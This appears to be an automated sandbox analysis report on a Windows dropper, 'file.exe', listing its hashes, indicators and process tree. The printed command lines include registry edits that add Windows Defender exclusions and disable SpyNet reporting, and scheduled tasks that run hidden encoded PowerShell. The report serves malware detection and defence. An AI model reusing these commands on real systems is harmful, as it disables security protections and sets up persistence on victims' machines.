Analysis
-
max time kernel
90s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
27-10-2022 10:47
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
5164bbe879fcec47b89953a252fce692
-
SHA1
286c9f91bf8a99cc7714dcccef3b7d666da14318
-
SHA256
4e38bf2b65ef2527c628f54e32aec850b0b4c33d61840dc9b8752282d069d338
-
SHA512
2b942ab2328d00ccda3d9d31a678503a5310243cf2fdec07558d3e7903fe6ad770b0b351c451fc6e9c5813994422b9c4a796d31aac55f00f87c31bbc8778ee02
-
SSDEEP
196608:91O3kAwXLkTqGjp4kAFYyQLmTlU59JdpH0c1:3O3kAw7uKzFLQLylUbtN1
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 57 4880 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4764 Install.exe 3568 Install.exe 4236 LLuMqrw.exe 4552 cLAQmew.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation cLAQmew.exe -
Loads dropped DLL 1 IoCs
pid Process 4880 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json cLAQmew.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json cLAQmew.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini cLAQmew.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 cLAQmew.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 cLAQmew.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol LLuMqrw.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini LLuMqrw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 cLAQmew.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 cLAQmew.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 cLAQmew.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja cLAQmew.exe File created C:\Program Files (x86)\KlxBVdQvPHUU2\yklPGcQ.xml cLAQmew.exe File created C:\Program Files (x86)\wfePzGzbIQGEC\naoivYB.dll cLAQmew.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi cLAQmew.exe File created C:\Program Files (x86)\KlxBVdQvPHUU2\OGopBWyuGqbtl.dll cLAQmew.exe File created C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\fKEOKLi.dll cLAQmew.exe File created C:\Program Files (x86)\mATVtTtwRBfYoVEuAWR\MgIdusR.xml cLAQmew.exe File created C:\Program Files (x86)\prTKcPnPU\GpWuqt.dll cLAQmew.exe File created C:\Program Files (x86)\prTKcPnPU\gHHQXwG.xml cLAQmew.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak cLAQmew.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak cLAQmew.exe File created C:\Program Files (x86)\wfePzGzbIQGEC\atAwCbC.xml cLAQmew.exe File created C:\Program Files (x86)\DyLrXeBYgDUn\DLrDBLH.dll cLAQmew.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi cLAQmew.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bKcODTUCyUvoWvuOBb.job schtasks.exe File created C:\Windows\Tasks\zZBlWYGpCEMqhJzIS.job schtasks.exe File created C:\Windows\Tasks\SOnJrQRHBOIzCQS.job schtasks.exe File created C:\Windows\Tasks\uDKngRYOrVZAGISPK.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 384 schtasks.exe 3932 schtasks.exe 968 schtasks.exe 4788 schtasks.exe 2412 schtasks.exe 1292 schtasks.exe 3024 schtasks.exe 4464 schtasks.exe 4944 schtasks.exe 3612 schtasks.exe 3296 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" cLAQmew.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" cLAQmew.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer cLAQmew.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" cLAQmew.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix cLAQmew.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket cLAQmew.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" cLAQmew.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" cLAQmew.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cLAQmew.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\MaxCapacity = "15140" cLAQmew.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 5056 powershell.EXE 5056 powershell.EXE 2396 powershell.exe 2396 powershell.exe 960 powershell.exe 960 powershell.exe 3588 powershell.EXE 3588 powershell.EXE 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe 4552 cLAQmew.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 5056 powershell.EXE Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeDebugPrivilege 3588 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2160 wrote to memory of 4764 2160 file.exe 84 PID 2160 wrote to memory of 4764 2160 file.exe 84 PID 2160 wrote to memory of 4764 2160 file.exe 84 PID 4764 wrote to memory of 3568 4764 Install.exe 85 PID 4764 wrote to memory of 3568 4764 Install.exe 85 PID 4764 wrote to memory of 3568 4764 Install.exe 85 PID 3568 wrote to memory of 4560 3568 Install.exe 89 PID 3568 wrote to memory of 4560 3568 Install.exe 89 PID 3568 wrote to memory of 4560 3568 Install.exe 89 PID 3568 wrote to memory of 3168 3568 Install.exe 91 PID 3568 wrote to memory of 3168 3568 Install.exe 91 PID 3568 wrote to memory of 3168 3568 Install.exe 91 PID 4560 wrote to memory of 4972 4560 forfiles.exe 93 PID 4560 wrote to memory of 4972 4560 forfiles.exe 93 PID 4560 wrote to memory of 4972 4560 forfiles.exe 93 PID 3168 wrote to memory of 440 3168 forfiles.exe 94 PID 3168 wrote to memory of 440 3168 forfiles.exe 94 PID 3168 wrote to memory of 440 3168 forfiles.exe 94 PID 4972 wrote to memory of 2296 4972 cmd.exe 96 PID 4972 wrote to memory of 2296 4972 cmd.exe 96 PID 4972 wrote to memory of 2296 4972 cmd.exe 96 PID 440 wrote to memory of 5076 440 cmd.exe 95 PID 440 wrote to memory of 5076 440 cmd.exe 95 PID 440 wrote to memory of 5076 440 cmd.exe 95 PID 4972 wrote to memory of 4616 4972 cmd.exe 97 PID 4972 wrote to memory of 4616 4972 cmd.exe 97 PID 4972 wrote to memory of 4616 4972 cmd.exe 97 PID 440 wrote to memory of 912 440 cmd.exe 98 PID 440 wrote to memory of 912 440 cmd.exe 98 PID 440 wrote to memory of 912 440 cmd.exe 98 PID 3568 wrote to memory of 4944 3568 Install.exe 100 PID 3568 wrote to memory of 4944 3568 Install.exe 100 PID 3568 wrote to memory of 4944 3568 Install.exe 100 PID 3568 wrote to memory of 2872 3568 Install.exe 102 PID 3568 wrote to memory of 2872 3568 Install.exe 102 PID 3568 wrote to memory of 2872 3568 Install.exe 102 PID 5056 wrote to memory of 1944 5056 powershell.EXE 106 PID 5056 wrote to memory of 1944 5056 powershell.EXE 106 PID 3568 wrote to memory of 3564 3568 Install.exe 113 PID 3568 wrote to memory of 3564 3568 Install.exe 113 PID 3568 wrote to memory of 3564 3568 Install.exe 113 PID 3568 wrote to memory of 3612 3568 Install.exe 115 PID 3568 wrote to memory of 3612 3568 Install.exe 115 PID 3568 wrote to memory of 3612 3568 Install.exe 115 PID 4236 wrote to memory of 2396 4236 LLuMqrw.exe 119 PID 4236 wrote to memory of 2396 4236 LLuMqrw.exe 119 PID 4236 wrote to memory of 2396 4236 LLuMqrw.exe 119 PID 2396 wrote to memory of 4812 2396 powershell.exe 121 PID 2396 wrote to memory of 4812 2396 powershell.exe 121 PID 2396 wrote to memory of 4812 2396 powershell.exe 121 PID 4812 wrote to memory of 4172 4812 cmd.exe 122 PID 4812 wrote to memory of 4172 4812 cmd.exe 122 PID 4812 wrote to memory of 4172 4812 cmd.exe 122 PID 2396 wrote to memory of 1344 2396 powershell.exe 123 PID 2396 wrote to memory of 1344 2396 powershell.exe 123 PID 2396 wrote to memory of 1344 2396 powershell.exe 123 PID 2396 wrote to memory of 1748 2396 powershell.exe 124 PID 2396 wrote to memory of 1748 2396 powershell.exe 124 PID 2396 wrote to memory of 1748 2396 powershell.exe 124 PID 2396 wrote to memory of 2116 2396 powershell.exe 125 PID 2396 wrote to memory of 2116 2396 powershell.exe 125 PID 2396 wrote to memory of 2116 2396 powershell.exe 125 PID 2396 wrote to memory of 1976 2396 powershell.exe 126 PID 2396 wrote to memory of 1976 2396 powershell.exe 126
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\7zSA974.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Users\Admin\AppData\Local\Temp\7zSAE07.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2296
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4616
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:440 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:5076
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:912
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGkZsnjkj" /SC once /ST 05:54:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGkZsnjkj"4⤵PID:2872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGkZsnjkj"4⤵PID:3564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKcODTUCyUvoWvuOBb" /SC once /ST 10:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\KPaUieawoGhgiPB\LLuMqrw.exe\" ra /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3612
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1944
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3332
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2064
-
C:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\KPaUieawoGhgiPB\LLuMqrw.exeC:\Users\Admin\AppData\Local\Temp\JPYWILqPnlXqPFjOR\KPaUieawoGhgiPB\LLuMqrw.exe ra /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4236 -
